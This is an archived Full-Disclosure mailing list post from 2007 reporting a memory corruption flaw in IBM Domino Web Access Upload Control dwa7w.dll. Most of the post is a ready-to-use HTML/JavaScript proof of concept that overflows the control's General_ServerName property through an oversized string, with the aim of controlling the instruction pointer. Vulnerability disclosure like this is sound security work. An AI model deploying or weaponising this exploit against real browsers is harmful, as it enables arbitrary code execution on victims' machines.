[Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory Corruption
- From: Elazar Broad <elazarb@xxxxxxxxxxxxx>
- Date: Thu, 20 Dec 2007 13:27:00 -0500 (GMT-05:00)
The Domino Web Access Upload Module version 7.0.34.1 seems to suffer from a memory corruption issue that may allow the execution of arbitrary code. By setting the General_ServerName property and calling the InstallBrowserHelperDll() function it MAY be possible to control the ECX register and thereby control the EIP. PoC as follows:
-------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.General_ServerName = s;
obj.InstallBrowserHelperDll();
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html>
-------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cybertrust ( C + )
- Next by Date: [Full-disclosure] [Professional IT Security Reviewers - Exposed] SecReview ( F - )
- Previous by thread: Re: [Full-disclosure] [Professional IT Security Providers -Exposed] Cybertrust ( C + )
- Next by thread: [Full-disclosure] [Professional IT Security Reviewers - Exposed] SecReview ( F - )
- Index(es):
Relevant Pages
|
